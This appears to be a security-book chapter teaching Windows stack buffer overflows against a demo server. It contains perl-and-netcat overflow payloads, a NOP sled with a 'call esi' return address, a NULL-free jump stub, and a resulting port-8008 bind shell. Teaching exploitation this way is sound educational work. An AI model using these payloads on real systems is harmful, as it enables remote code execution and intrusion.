Buffer Overflows

To begin, we need to go over some required and helpful tools and skills. To ease your way through this chapter you need to have at least a cursory knowledge of the following technologies and concepts:

x86 Assembler

C programming language

Application debugging concepts

In addition, a few tools are required to get the most out of this chapter and help you follow the examples later on:

SoftIce by Numega (http://www.numega.com)

Microsoft's Visual C++ (or a C++ compiler of your choice) (http://www.microsoft.com/vstudio)

Interactive Dissassembler Pro by DataRescue (http://www.datarescue.com)

Netcat by Hobbit (http://packetstorm.deceptions.org/unix-exploits/network-scanners/)

Perl by ActiveState (http://www.activestate.com)

W32Dasm by URSoftware Co. (http://members.home.net/w32dasm/)

Buffer Overflow: Its Simplest Form

A buffer overflow occurs when the amount of data being written to memory is larger than the amount of memory reserved for the operation. When that occurs, the data being written actually gets written to memory beyond the reserved section. As a result, the extra data has to go somewhere; and you can bet your next paycheck that it will be going somewhere undesirable.

Consider the following code snippet:

void overflow(void)

char *name="hackingexposedhackingexposedhackingexposed";

char buff[10];

strcpy(buff, name);

return;

The variable buff is allocated 10 bytes (char buff[10]) to store data. The string at the pointer *name is then copied into the buffer (buff[10]). Because the string at *name is far larger than the buffer allocated to handle it, the data overflows into memory. Where did the extra characters go and how can we possibly use these rogue bytes to our advantage? Before we head down that path a few more fundamentals are in order.

Assembly Language in a Nutshell

Assembly language is a low-level language written to a particular architecture and central processing unit (CPU). There are numerous varieties of assembly language including the most popular: Intel 80x86, SPARC, RISC, and Digital. Assembly language allows a programmer to tell the hardware of a system to perform direct actions, such as open a serial port, overwrite memory, or draw a line on the screen. Such a complicated topic as assembly languages is beyond the scope of this book. However, we provide a brief introduction to this low-level, Matrix-like, opcode world. We discuss only what is absolutely necessary to enable you to follow the material in this chapter.

Assembly language is the computer system's native tongue. When coding in assembler you are making direct use of the processor's instructions. You can access the processor completely, without the constraints and extra code of high-level languages. Generally, programs coded in assembly are smaller, faster, and take up less memory than their high-level counterparts. And they also are prone to obscure well-concealed bugs!

General Purpose Registers

Anyone who's tried to copy a 2MB file to 1.44MB floppy disk knows all too well what bytes are (or the lack thereof, in this case). Bytes were designed for end-users, because computers really store data as bits (binary 1s and 0s). Bytes are represented as 8 bits in a standard CPU, allowing up to 256 to be stored in this 8-bit byte:

Byte	1	2	3	4	5	6	7	8
Value	128	64	32	16	8	4	2	1
Examples
3	=	0	0	0	0	0	0	1	1
129	=	1	0	0	0	0	0	0	1
256	=	1	1	1	1	1	1	1	1

Registers are places in the CPU where bits can be stored and manipulated. Generally, there are four register sizes: 8, 16, 32, and 64 bits. In the preceding examples, the size of the register in use is 8 bits.

General purpose registers are generally 16 bits in size and are named AX, BX, CX, and DX. All the general purpose registers may be used in whatever way you desire. They also have specific uses for various situations. Before the days of the 80386 processor, each general purpose 16-bit register comprised of two high and low 8-bit halves. AX is made up of AL and AH, BX contains BL and BH, CX contains CL and CH, and DX is made up of DL and DH.

An example of the AX register, using the number 25263, is:

AH	11000101
AL	0101111

The two 8-bit halves can be operated on directly and any modifications will have an affect on the register as a whole. As computing entered the 32-bit world, the registers were extended to accommodate this increase in size. The "E" represents 32-bit. You may of course operate on the 16-bit or 8-bit portions alone.

EAX [AH/AL]:	The Accumulator register. EAX is primarily used for I/O, arithmetic, and calling services.
EBX [BH/BL]:	The Base register is often used as a pointer to a base address.
ECX [CH/CL]:	The Count register is used during loop and repetition operations.
EDX [DH/DL]:	The Data register is used in arithmetic and I/O operations. The uses of the general purpose registers are by no means set in stone; it's up to you to use them as you see fit. In some operations the registers have required uses, however.

Pointer (a.k.a. Index) Registers

Pointer registers are 16-bits in length and are primarily used for string instructions. There are three pointer registers and two index registers:

ESP	Stack pointer	The stack pointer always points to the top of the processor's stack. More on the stack later.
EBP	Base pointer	The base pointer usually addresses variables stored inside the stack.
ESI and EDI	Source index and destination index	Both indexes are commonly referred to as string registers and typically process byte strings.
EIP	Instruction pointer	The instruction pointer specifies the next code instruction to be executed. When you control the instruction pointer, you control the process.

The Stack

The stack is a special segment of memory used for three main purposes:

To store the return addresses of functions

To store register values

To store variables

Think of a stack like a pile of plates. You can remove a plate only from the top and add a plate only to the top. Removing a plate is known as a pop and adding a plate is referred to as a push. This type of stack is known as a last in, first out (LIFO) stack. When a function is called, register values, function parameters, and variables, along with the return address, are pushed onto the stack. As memory is allocated on the stack and situated before the return address, you may reach outside the bounds of the allocated memory and overwrite the value of the return address and return to any location; doing so creates a buffer overflow.

Assembler Instructions

To write your own exploit code you must know a few assembly language instructions. Table 14-1 highlights those that you need to focus on before firing up the assembly compiler.

Tracking the Rogue Bytes

Now, back to where we left off. Let's take the same code snippet discussed earlier and break down how the CPU handles the code and more important how the memory, stack, and registers look while the program is working. Repeating the previous code snippet:

void overflow(void)

char *name="hackingexposedhackingexposedhackingexposed";

char buff[10];

strcpy(buff, name); <=

return;

Table 14-1. Basic Assembly instructions

General instructions

pop destination

push destination

mov destination, source

Pop data from the stack.

Push data onto the stack.

Move or copy a byte, word, or dword between registers or between registers and memory.

Address instructions

lea destination, source

add destination, source

inc destination

Load effective address.

Add bytes, words, or dwords.

Increment.

Addition instructions

cmp destination, source

dec destination

sub destination, source

Compare.

Decrement byte, word, or dwords.

Subtract.

Logic instructions

xor destination, source

test destination, source

or destination, source

shr destination, count

add destination, source

Logical exclusive OR

Test bits.

Logical OR

Shift right.

Add bytes, words, or dwords.

Shift/rotate instructions

Shl destination, count

Shr destination, count

Shift left.

Shift right.

Unconditional transfer instructions

Call target

Jmp target

Ret value

Call procedure.

Jump unconditionally.

Return from procedure.

When the procedure "overflow" is called, the stack layout at the point referenced by "<=" in the proceeding overflow() function, looks like this:

address of *name

address of buff

vars

buff

saved ebp

return of address

When the strcpy function is called, the bytes point to *name are transferred to our buffer buff, which is allocated on the stack. The extra bytes then overwrite the saved ebp along with the saved return address. When the overflow() function returns, ebp is then moved back to esp and what should be the saved return address is popped off the stack.

In normal situations, the instruction pointer (EIP) contains the address of the next instruction after the call. Because we have overwritten the return address with our own bytes, EIP now points to this location. As a result, upon running the program, we are greeted with an all too familiar sight in the hacker world: the Application Error (a.k.a. the "Dr. Watson error"), as shown in Figure 14-1.

Figure 14-1. Application Error message

graphics/14fig01.gif

But, let's take a closer look at those bytes. The first value, 0x70786567, is the hexadecimal value of "pxeg," as in "hacking exposed." Thus we can overwrite the EIP with our strcpy() of buff. And, if we can modify the value of the instruction pointer, we can seriously alter the course of the program by pointing the EIP to code that we overwrite in memory with the overflow. What if we fill the buff buffer with machine code (the binary representation of assembly language instruction) and overwrite the EIP with a pointer to that code? We have the single greatest fear of almost any software company concerned with security. We would be able to execute any command on the remote target system without ever guessing a password; in other words, the world would be in our hands.

Buffer Overflow: An Example

Let's move on to an interesting example, including an explanation of how we can turn this situation to our advantage.

We have three options in our quest for buffer overflow vulnerabilities:

Source code review

Disassembly

Blind stress testing

If we want to exploit Windows, the focus of this chapter, we're limited to the last two options: disassembly and blind stress testing. Let's consider each and their inherent strengths and weaknesses.

Disassembly

Disassembly is the art of taking a binary executable program (a.k.a. software) and turning it into assembly language or instructions for the CPU to carry out on the computer. If we're serious about reverse engineering there is only one tool of choice Interactive Disassembler Professional from Datarescue.

In the closed-source world of Windows, the ability to look beneath the surface is an incredibly valuable asset. To locate vulnerabilities via this method requires an understanding of how high-level functions are translated into assembly. For example, consider this common snippet of C code:

int vuln(char *user)

char buffer[500];

sprintf(buffer, "%s is an invalid username", user);

return 1;

An argument of user-defined length user is being copied into the 500 byte buffer (buffer). As we control the amount of data being passed into the buffer, we can overflow the boundaries and with any luck execute arbitrary code.

The code looks like this in the disassembler:

mov  eax, [ebp+8]

push  eax

push  offset aSIsAnInvalidUs ; "%s is an invalid username"

lea  ecx, [ebp-1F4h]

push  ecx

call  _sprintf

First, a few essentials. Parameters are pushed onto the stack in reverse order. On the one hand, almost every instruction that references memory above EBP (e.g. [ebp+8]) is referencing a procedure parameter. On the other hand, local variables are referenced as negative offsets from EBP (e.g. [ebp-1F4h]).

So what's going on? The parameter referenced at [ebp+8] (our user string) is passed to eax and then pushed onto the stack. Next the sprintf arguments are pushed, followed by the buffer. Here, 0x1f4 equates to 500 decimal (the 500 byte buffer). When reverse engineering, you should investigate these types of calls first. So long as you remember the first few essentials, you won't have any trouble deciphering the low level conversion of functions.

Blind Stress Testing

When attacking a mail server, for instance, before diving headfirst into pages of assembly code, we often find it easier and almost as effective to just go by the book. By obtaining the SMTP RFC (request for comments) we have all the information we need with respect to the default commands expected by the server: Send long strings as parameters to the commands. It's as simple as that.

A good tool for the job is NTOMax, a free tool from Foundstone (http://www.foundstone.com).

We see from the source of ch14server.c where the offending code lies:

void crash(void){

  char buff[1400];

  strcpy(buff, rbuff);

  return;

The data received over the socket held in the variable rbuff is passed to the 1400 byte buffer buff without any form of bounds checking. So, obviously, if we send in excess of 1400 bytes of data we'll overwrite memory that we shouldn't. Let's see if we can overwrite anything important. To begin, execute ch14server.exe:

C:\> ch14server.exe

Load up SoftIce and type ctrl-d to enter. If you're running in a Win9x environment, the command "faults on" should do the trick. This will trap any memory violations. However, if you're running NT or Windows 2000 "faults on" alone won't do it. Unfortunately, SoftIce tends to have a little trouble trapping exceptions in this environment. Instead, type:

bpx kiuserexceptiondispatcher do "u *(*esp+0c)"

This command sets a breakpoint on the NT exception handler and disassembles the address pointed to by esp+0c. That address holds the location of where the exception occurred. From the command line type:

C:\> perl -e 'print "x" x 1400 . "abcd\n" '|nc yourhost 9999

Doing so sends 1400 bytes of the character "x" to TCP port 9999, followed by 4 bytes that really have no place to go except over important memory locations. Figure 14-2 was derived from the Visual C++ debugger, merely for aesthetic purposes.

Figure 14-2. EIP overwritten by "abcd"

graphics/14fig02.gif

Note in the upper left portion of the screen that the instruction pointer was overwritten by the hex sequence 0x64636261, which translates to the "abcd" addition of our string.

Now that we have control of the processor, where do we go? We are presented with a couple of options. Option one is to direct a jump of the stack, but unfortunately, because of the 1-crash-allowance of Windows, this isn't a particularly good option. Having an idea of the stack layout is fine, or perhaps having a large enough NOOP (no operation) sled will enable us to hit pay dirt. But, ideally, we want something foolproof. Option two is to jump to a code snippet of the process itself or to a loaded DLL that will execute our code. Let's take a look at the registers and see what we have to play with.

We quickly see that one of the few registers pointing to anything useful is ESI, which points directly into our buffer. Try it for yourself by typing "d esi" in SoftIce. Ideally what we want is a snippet of code loaded in memory that performs a "call esi" or "jmp esi." This will execute the code at the memory location pointed to by the register. The best bet is code from the executable itself, because it remains static.

We now load ch14server.exe into W32Dasm. For real reversing work, W32Dasm doesn't do the trick, but it does have its uses. It is extremely fast, so for locating an instruction sequence it is ideal. Finally, we enter "call esi" in the search box, as shown in Figure 14-3.

Figure 14-3. Search box

graphics/14fig03.gif

We find exactly what we're after at offset 0x0040336e, except this time, instead of appending our "abcd" string, we append the address of "call esi." Remember, the NULL termination takes care of the last byte. Instead of sending the character "x," we send NOOPs and imbed an int3 in them. To do so, we enter SoftIce and type "bpint 3" to set a breakpoint on the interrupt. We then execute this chain of commands on the system:

perl -e 'print "\x90" x 1399 . "\xCC\x6e\x33\x40"' nc yourhost 9999

We now have sent 1399 nops, followed by the opcode "CC," which translates to int 3 and finally the replacement return address, which will perform a "call esi." If all went according to plan, the debugger should kick in as it reaches the interrupt. We now have code executing on the remote process.

Obviously in the real world, code that executes nops and an embedded interrupt is of no real worth. So let's plug in something a little more useful and see what is happening.

(A site maintained by a fellow named Izan provides a handy online tool to generate port-binding win32 shellcode. It is available at http://www.deepzone.org.)

The generator requires addresses from the executable/dll for the two functions LoadLibraryA and GetProcAddress. We can find the two offsets by searching the disassembler or by using a tool such as DUMPBIN to display the import addresses. Figure 14-4 shows the locations of the two functions.

Figure 14-4. Addresses for functions LoadLibraryA and GetProcAddress

graphics/14fig04.gif

The two needed offsets are 00406068 and 004060a8. The two functions are used in the shellcode to dynamically obtain the addresses of other functions. The generator can produce shellcode in ASM, C, perl, and Java formats. The byte sequence we must send consists of:

0x90 * 1400 -- sizeof(shellcode) <shellcode> <ret address>

When the server receives this string, the saved return address from the crash() call is overwritten by our address that points to "call esi." The data at ESI points to our nopsled followed by our port binding shellcode. When the function returns, instead of returning to where it should, it returns to the location of "call esi," which then executes our code.

Unfortunately we face a minor problem. The bytes we control at ESI aren't quite enough to contain the entire deepzone shellcode. Let's once again consult the disassembly. We see that the address 0x004098fc is pushed before the call to recv(). That's the address that holds the received bytes. If we add code to our string that will jump to that address we should be home free:

xor eax, eax  ; set eax to 0

mov eax, 4098fc99h  ; move the recv address into eax followed by 99 hex

shr eax, 08  ; knock off the 99 byte

xor ecx, ecx   ; set ecx to 0

mov cl, 20h  ; set ecx to 20h

add eax, ecx  ; add to eax to skip over this code

call eax  ; call our shellcode

When this code is executed, it will locate the initial buffer, add to it slightly to skip over this code, and then execute. The reason for the somewhat nonstandard assembler code is to avoid the use of NULL bytes. To understand the exploitation action fully, we recommend that you step through the code in the debugger:

C:\exploit>Ch14client 192.168.10.2 9999

Chapter 14 buffer overflow demonstration exploit.

Connecting....

Data sent.

Telnet to 192.168.10.2 port 8008 now.

C:\exploit>

Trying 192.168.10.2....

Connected to acmelabs.net (192.168.10.2).

Escape character is '^];.

Microsoft Windows 2000 [Version 5.00.2195]

  Copyright 1985-1999 Microsoft Corp.

C:\exploit>

The shellcode binds a full-fledged command prompt to port 8008. With a command prompt of this sort, the possibilities are endless.